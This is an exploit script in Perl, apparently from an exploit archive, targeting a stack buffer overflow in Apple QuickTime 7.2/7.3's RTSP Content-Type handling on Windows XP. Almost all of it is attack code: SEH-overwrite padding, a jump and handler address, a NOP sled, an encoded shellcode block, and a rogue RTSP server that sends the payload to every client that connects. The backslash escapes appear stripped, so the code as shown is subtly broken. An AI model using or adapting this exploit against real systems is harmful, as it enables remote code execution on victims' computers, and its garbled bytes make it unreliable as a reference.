# Exploit Title: Apple QuickTime 7.2/7.3 RTSP BOF (Perl)
# Date: 2009-01-06
# Author: Jacky
# Software Link: [downoad link if available]
# Version: 7.2/7.3
# Tested on: Windows XP SP3
# CVE : [if exists]
# Code :
#Apple QuickTime 7.2/7.3 RTSP BOF (Perl Edition )
#Discovered by (Krystian Kloskowski (h07) <h07@interia.pl>)
#Written and coded by Jacky!
#All Greetz to Peter Van Eeckhoutte and Corelan Team ( Best exploitation team);-)
#This time i wrote the exploit in perl , because i saw that it was written
#many times in python and ruby only !
#This exploit is for EDUCATIONAL PURPOSES ONLY !!!
#!/usr/bin/perl -w
# (RTSP) Content-Type: [A * 995] + [B * 4096]rn
#
# 0x41414141 Pointer to next SEH record
# 0x42424242 SE handler
use strict;
use Socket;
my $junk="A"x991;
my $nseh="xebx06x90x90";
my $seh="x4ex28x86x66"; #x4ex28x86x66
my $nops="x90"x20;
my $shellcode="x89xe2xddxc4xd9x72xf4x58x50x59x49x49x49x49" .
"x49x49x49x49x49x49x43x43x43x43x43x43x37x51" .
"x5ax6ax41x58x50x30x41x30x41x6bx41x41x51x32" .
"x41x42x32x42x42x30x42x42x41x42x58x50x38x41" .
"x42x75x4ax49x4bx4cx48x68x4fx79x43x30x43x30" .
"x47x70x45x30x4bx39x4dx35x50x31x49x42x45x34" .
"x4ex6bx46x32x44x70x4cx4bx50x52x44x4cx4cx4b" .
"x42x72x45x44x4cx4bx50x72x51x38x44x4fx4fx47" .
"x50x4ax47x56x46x51x49x6fx45x61x4bx70x4cx6c" .
"x45x6cx43x51x51x6cx47x72x46x4cx47x50x4fx31" .
"x4ax6fx44x4dx46x61x49x57x4ax42x48x70x46x32" .
"x46x37x4ex6bx50x52x46x70x4cx4bx47x32x47x4c" .
"x45x51x4ex30x4ex6bx51x50x44x38x4bx35x4bx70" .
"x43x44x43x7ax46x61x4ex30x46x30x4ex6bx50x48" .
"x46x78x4cx4bx51x48x47x50x46x61x49x43x4bx53" .
"x47x4cx50x49x4cx4bx46x54x4cx4bx46x61x48x56" .
"x50x31x49x6fx50x31x49x50x4ex4cx4fx31x48x4f" .
"x44x4dx47x71x48x47x46x58x4bx50x44x35x49x64" .
"x44x43x51x6dx4ax58x47x4bx43x4dx44x64x50x75" .
"x4ax42x50x58x4ex6bx42x78x47x54x46x61x4bx63" .
"x43x56x4ex6bx44x4cx42x6bx4cx4bx42x78x45x4c" .
"x45x51x49x43x4ex6bx44x44x4cx4bx47x71x4ex30" .
"x4cx49x43x74x44x64x44x64x43x6bx51x4bx51x71" .
"x43x69x43x6ax43x61x4bx4fx49x70x42x78x43x6f" .
"x42x7ax4ex6bx45x42x4ax4bx4fx76x51x4dx51x7a" .
"x45x51x4ex6dx4bx35x4dx69x43x30x47x70x47x70" .
"x50x50x45x38x45x61x4cx4bx42x4fx4ex67x4bx4f" .
"x49x45x4dx6bx49x6ex44x4ex44x72x4bx5ax45x38" .
"x4fx56x4fx65x4dx6dx4fx6dx49x6fx4ax75x45x6c" .
"x47x76x43x4cx46x6ax4dx50x49x6bx49x70x44x35" .
"x44x45x4fx4bx51x57x47x63x50x72x50x6fx42x4a" .
"x43x30x46x33x4bx4fx48x55x45x33x51x71x42x4c" .
"x42x43x44x6ex42x45x44x38x43x55x45x50x41x41";
my $rest="B"x(4096-length($seh.$nops.$shellcode));
my $payload=$junk.$nseh.$seh.$nops.$shellcode.$rest;
my $header = "RTSP/1.0 200 OKrn".
"CSeq: 1rn".
"Date: 0x00 :Prn".
"Content-Base: rtsp://0.0.0.0/1.mp3/rn".
"Content-Type: $payloadrn".
"Content-Length: 334rn".
"rn";
my $body = "v=0rn".
"o=- 16689332712 1 IN IP4 0.0.0.0rn".
"s=MPEG-1 or 2 Audio, streamed by the PoC Exploit o.Orn".
"i=1.mp3rn".
"t=0 0rn".
"a=tool:ciamciaramciarn".
"a=type:broadcastrn".
"a=control:*rn".
"a=range:npt=0-213.077rn".
"a=x-qt-text-nam:MPEG-1 or 2 Audio, streamed by the PoC Exploit o.Orn".
"a=x-qt-text-inf:1.mp3rn".
"m=audio 0 RTP/AVP 14rn".
"c=IN IP4 0.0.0.0rn".
"a=control:track1rn";
my $evil=$header.$body;
my $port=shift || 554;
my $proto=getprotobyname('tcp');
socket(SERVER,PF_INET,SOCK_STREAM,$proto);
my $paddr=sockaddr_in($port,INADDR_ANY);
bind(SERVER,$paddr);
listen(SERVER,SOMAXCONN);
print "[+]Listening on [RTSP]554n";
my $client_addr;
while($client_addr=accept(CLIENT,SERVER))
{
print CLIENT $evil;
print "[+]Connection Acceptedn";
print "[+]Sending Evil Payloadn";
}
close CLIENT;
print "[+]Connection closedn";